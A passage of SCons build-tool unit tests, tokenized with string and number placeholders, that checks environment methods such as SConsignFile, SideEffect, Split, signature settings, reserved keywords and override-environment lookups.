SConstruct_dir = os . sep + '<STR_LIT>' <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , <EOL> BAR = os . path . join ( os . sep , '<STR_LIT>' ) ) <EOL> env . fs = MyFS ( ) <EOL> env . Execute = lambda action : None <EOL> try : <EOL> fnames = [ ] <EOL> dbms = [ ] <EOL> def capture ( name , dbm_module , fnames = fnames , dbms = dbms ) : <EOL> fnames . append ( name ) <EOL> dbms . append ( dbm_module ) <EOL> save_SConsign_File = SCons . SConsign . File <EOL> SCons . SConsign . File = capture <EOL> env . SConsignFile ( '<STR_LIT:foo>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT:foo>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( '<STR_LIT>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( '<STR_LIT>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . sep + '<STR_LIT>' , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( os . sep + '<STR_LIT>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . 
sep + '<STR_LIT>' , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( '<STR_LIT>' , '<STR_LIT:x>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == '<STR_LIT:x>' , dbms <EOL> env . SConsignFile ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == <NUM_LIT:7> , dbms <EOL> env . SConsignFile ( ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( None ) <EOL> assert fnames [ - <NUM_LIT:1> ] == None , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> finally : <EOL> SCons . SConsign . File = save_SConsign_File <EOL> def test_SideEffect ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( LIB = '<STR_LIT>' , FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> foo = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> bar = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = env . SideEffect ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert s . __class__ . __name__ == '<STR_LIT>' , s . __class__ . __name__ <EOL> assert s . path == '<STR_LIT>' <EOL> assert s . side_effect <EOL> assert foo . side_effects == [ s ] <EOL> assert bar . side_effects == [ s ] <EOL> fff = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> bbb = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = env . SideEffect ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert s . __class__ . __name__ == '<STR_LIT>' , s . __class__ . __name__ <EOL> assert s . path == '<STR_LIT>' <EOL> assert s . side_effect <EOL> assert fff . 
side_effects == [ s ] , fff . side_effects <EOL> assert bbb . side_effects == [ s ] , bbb . side_effects <EOL> ggg = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> ccc = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = env . SideEffect ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert s . __class__ . __name__ == '<STR_LIT>' , s . __class__ . __name__ <EOL> assert s . path == '<STR_LIT>' <EOL> assert s . side_effect <EOL> assert ggg . side_effects == [ s ] , ggg . side_effects <EOL> assert ccc . side_effects == [ s ] , ccc . side_effects <EOL> def test_SourceCode ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> e = env . SourceCode ( '<STR_LIT:foo>' , None ) [ <NUM_LIT:0> ] <EOL> assert e . path == '<STR_LIT:foo>' <EOL> s = e . src_builder ( ) <EOL> assert s is None , s <EOL> b = Builder ( ) <EOL> e = env . SourceCode ( e , b ) [ <NUM_LIT:0> ] <EOL> assert e . path == '<STR_LIT:foo>' <EOL> s = e . src_builder ( ) <EOL> assert s is b , s <EOL> e = env . SourceCode ( '<STR_LIT>' , None ) [ <NUM_LIT:0> ] <EOL> assert e . path == '<STR_LIT>' <EOL> s = e . src_builder ( ) <EOL> assert s is None , s <EOL> def test_SourceSignatures ( type ) : <EOL> """<STR_LIT>""" <EOL> import SCons . Errors <EOL> env = type . TestEnvironment ( M = '<STR_LIT>' , T = '<STR_LIT>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> env . 
SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> try : <EOL> import SCons . Util <EOL> save_md5 = SCons . Util . md5 <EOL> SCons . Util . md5 = None <EOL> try : <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> finally : <EOL> SCons . Util . md5 = save_md5 <EOL> def test_Split ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> s = env . Split ( "<STR_LIT>" ) <EOL> assert s == [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , s <EOL> s = env . Split ( "<STR_LIT>" ) <EOL> assert s == [ "<STR_LIT>" , "<STR_LIT:bar>" ] , s <EOL> s = env . Split ( [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] ) <EOL> assert s == [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , s <EOL> s = env . Split ( [ "<STR_LIT:foo>" , "<STR_LIT>" ] ) <EOL> assert s == [ "<STR_LIT:foo>" , "<STR_LIT>" ] , s <EOL> s = env . Split ( "<STR_LIT:foo>" ) <EOL> assert s == [ "<STR_LIT:foo>" ] , s <EOL> s = env . Split ( "<STR_LIT>" ) <EOL> assert s == [ "<STR_LIT>" ] , s <EOL> def test_TargetSignatures ( type ) : <EOL> """<STR_LIT>""" <EOL> import SCons . Errors <EOL> env = type . TestEnvironment ( B = '<STR_LIT>' , C = '<STR_LIT:content>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> assert not hasattr ( env , '<STR_LIT>' ) <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT:content>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT:content>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . 
tgt_sig_type == '<STR_LIT:content>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> try : <EOL> import SCons . Util <EOL> save_md5 = SCons . Util . md5 <EOL> SCons . Util . md5 = None <EOL> try : <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> try : <EOL> env . TargetSignatures ( '<STR_LIT:content>' ) <EOL> except SCons . Errors . UserError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> finally : <EOL> SCons . Util . md5 = save_md5 <EOL> def test_Value ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> v1 = env . Value ( '<STR_LIT:a>' ) <EOL> assert v1 . value == '<STR_LIT:a>' , v1 . value <EOL> value2 = '<STR_LIT:a>' <EOL> v2 = env . Value ( value2 ) <EOL> assert v2 . value == value2 , v2 . value <EOL> assert v2 . value is value2 , v2 . value <EOL> assert not v1 is v2 <EOL> assert v1 . value == v2 . value <EOL> v3 = env . Value ( '<STR_LIT:c>' , '<STR_LIT>' ) <EOL> assert v3 . value == '<STR_LIT:c>' , v3 . value <EOL> def test_Environment_global_variable ( type ) : <EOL> """<STR_LIT>""" <EOL> class MyEnv ( SCons . Environment . Base ) : <EOL> def xxx ( self , string ) : <EOL> return self . subst ( string ) <EOL> SCons . Environment . Environment = MyEnv <EOL> env = SCons . Environment . Environment ( FOO = '<STR_LIT:foo>' ) <EOL> f = env . subst ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT:foo>' , f <EOL> f = env . xxx ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT:foo>' , f <EOL> def test_bad_keywords ( self ) : <EOL> """<STR_LIT>""" <EOL> added = [ ] <EOL> env = self . 
TestEnvironment ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> INIT = '<STR_LIT>' ) <EOL> bad_msg = '<STR_LIT>' <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Append ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> APPEND = '<STR_LIT>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . AppendUnique ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> APPENDUNIQUE = '<STR_LIT>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Prepend ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> PREPEND = '<STR_LIT>' ) <EOL> added . 
append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Prepend ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> PREPENDUNIQUE = '<STR_LIT>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Replace ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> REPLACE = '<STR_LIT:replace>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> copy = env . Clone ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> COPY = '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not copy . has_key ( x ) , env [ x ] <EOL> for x in added + [ '<STR_LIT>' ] : <EOL> assert copy . has_key ( x ) , bad_msg % x <EOL> over = env . 
Override ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:source>' , <EOL> '<STR_LIT>' : '<STR_LIT:target>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> for x in self . reserved_variables : <EOL> assert not over . has_key ( x ) , over [ x ] <EOL> for x in added + [ '<STR_LIT>' ] : <EOL> assert over . has_key ( x ) , bad_msg % x <EOL> def test_parse_flags ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = Environment ( tools = [ ] , parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CCFLAGS = None , parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CPPDEFINES = '<STR_LIT>' , parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> def test_clone_parse_flags ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = Environment ( tools = [ ] ) <EOL> env2 = env . Clone ( parse_flags = '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CCFLAGS = None ) <EOL> env2 = env . Clone ( parse_flags = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] is None , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = Environment ( tools = [ ] , CPPDEFINES = '<STR_LIT>' ) <EOL> env2 = env . Clone ( parse_flags = '<STR_LIT>' ) <EOL> assert not env . 
has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> class OverrideEnvironmentTestCase ( unittest . TestCase , TestEnvironmentFixture ) : <EOL> def setUp ( self ) : <EOL> env = Environment ( ) <EOL> env . _dict = { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } <EOL> env2 = OverrideEnvironment ( env , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> env3 = OverrideEnvironment ( env2 , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . envs = [ env , env2 , env3 ] <EOL> def checkpath ( self , node , expect ) : <EOL> return str ( node ) == os . path . normpath ( expect ) <EOL> def test___init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT:y>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> def test___delitem__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> del env3 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env3 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> del env3 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env3 . 
has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> del env3 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert not env3 . has_key ( '<STR_LIT>' ) , "<STR_LIT>" <EOL> def test_get ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env . get ( '<STR_LIT>' ) == '<STR_LIT:x>' , env . get ( '<STR_LIT>' ) <EOL> assert env2 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env2 . get ( '<STR_LIT>' ) <EOL> assert env3 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env3 . get ( '<STR_LIT>' ) <EOL> assert env . get ( '<STR_LIT>' ) == '<STR_LIT:y>' , env . get ( '<STR_LIT>' ) <EOL> assert env2 . get ( '<STR_LIT>' ) == '<STR_LIT:y>' , env2 . get ( '<STR_LIT>' ) <EOL> assert env3 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env3 . get ( '<STR_LIT>' ) <EOL> assert env . get ( '<STR_LIT>' ) == None , env . get ( '<STR_LIT>' ) <EOL> assert env2 . get ( '<STR_LIT>' ) == None , env2 . get ( '<STR_LIT>' ) <EOL> assert env3 . get ( '<STR_LIT>' ) == '<STR_LIT>' , env3 . get ( '<STR_LIT>' ) <EOL> def test_has_key ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env . has_key ( '<STR_LIT>' ) , env . has_key ( '<STR_LIT>' ) <EOL> assert env2 . has_key ( '<STR_LIT>' ) , env2 . has_key ( '<STR_LIT>' ) <EOL> assert env3 . has_key ( '<STR_LIT>' ) , env3 . has_key ( '<STR_LIT>' ) <EOL> assert env . has_key ( '<STR_LIT>' ) , env . has_key ( '<STR_LIT>' ) <EOL> assert env2 . has_key ( '<STR_LIT>' ) , env2 . has_key ( '<STR_LIT>' ) <EOL> assert env3 . has_key ( '<STR_LIT>' ) , env3 . has_key ( '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) , env . has_key ( '<STR_LIT>' ) <EOL> assert not env2 . has_key ( '<STR_LIT>' ) , env2 . has_key ( '<STR_LIT>' ) <EOL> assert env3 . has_key ( '<STR_LIT>' ) , env3 . 
has_key ( '<STR_LIT>' ) <EOL> def test_contains ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> '<STR_LIT:x>' in { '<STR_LIT:x>' : <NUM_LIT:1> } <EOL> except TypeError : <EOL> pass <EOL> else : <EOL> env , env2 , env3 = self . envs <EOL> assert '<STR_LIT>' in env <EOL> assert '<STR_LIT>' in env2 <EOL> assert '<STR_LIT>' in env3 <EOL> assert '<STR_LIT>' in env <EOL> assert '<STR_LIT>' in env2 <EOL> assert '<STR_LIT>' in env3 <EOL> assert not '<STR_LIT>' in env <EOL> assert not '<STR_LIT>' in env2 <EOL> assert '<STR_LIT>' in env3 <EOL> def test_items ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> items = env . Dictionary ( ) <EOL> assert items == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , items <EOL> items = env2 . Dictionary ( ) <EOL> assert items == { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:y>' } , items <EOL> items = env3 . Dictionary ( ) <EOL> assert items == { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , items <EOL> def test_items ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> items = env . items ( ) <EOL> items . sort ( ) <EOL> assert items == [ ( '<STR_LIT>' , '<STR_LIT:x>' ) , ( '<STR_LIT>' , '<STR_LIT:y>' ) ] , items <EOL> items = env2 . items ( ) <EOL> items . sort ( ) <EOL> assert items == [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT:y>' ) ] , items <EOL> items = env3 . items ( ) <EOL> items . sort ( ) <EOL> assert items == [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , items <EOL> def test_gvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> gvars = env . gvars ( ) <EOL> assert gvars == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , gvars <EOL> gvars = env2 . gvars ( ) <EOL> assert gvars == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , gvars <EOL> gvars = env3 . 
gvars ( ) <EOL> assert gvars == { '<STR_LIT>' : '<STR_LIT:x>' , '<STR_LIT>' : '<STR_LIT:y>' } , gvars <EOL> def test_lvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> lvars = env . lvars ( ) <EOL> assert lvars == { } , lvars <EOL> lvars = env2 . lvars ( ) <EOL> assert lvars == { '<STR_LIT>' : '<STR_LIT>' } , lvars <EOL> lvars = env3 . lvars ( ) <EOL> assert lvars == { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , lvars <EOL> def test_Replace ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT:y>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> env . Replace ( YYY = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env3 [ '<STR_LIT>' ] == '<STR_LIT>' , env3 [ '<STR_LIT>' ] <EOL> def test_FindIxes ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . FindIxes ( [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env2 . FindIxes ( [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env3 . 
FindIxes ( [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_ReplaceIxes ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . ReplaceIxes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env2 . ReplaceIxes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env3 . ReplaceIxes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_Dir ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . Dir ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env2 . Dir ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env3 . Dir ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> def test_Entry ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . Entry ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env2 . Entry ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env3 . Entry ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> def test_File ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> x = env . File ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> x = env2 . File ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) 